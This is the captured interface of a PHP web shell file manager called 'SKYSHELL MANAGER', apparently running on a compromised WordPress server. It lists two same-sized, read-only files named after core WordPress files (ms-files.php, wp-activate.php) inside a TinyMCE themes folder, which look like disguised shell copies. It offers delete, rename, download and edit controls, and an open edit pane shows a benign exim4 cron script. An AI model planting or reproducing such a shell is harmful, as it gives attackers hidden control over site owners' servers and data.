📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: exim4
#!/bin/sh # disabled by default, remove following line to enable. exit 0 if [ -n "$EX4DEBUG" ]; then echo "now debugging $0 $@" set -x fi [ -x /usr/lib/exim4/exim4 ] || exit 0 [ -f /etc/default/exim4 ] && . /etc/default/exim4 # Flush exim queue /usr/sbin/exim4 -qqf
Save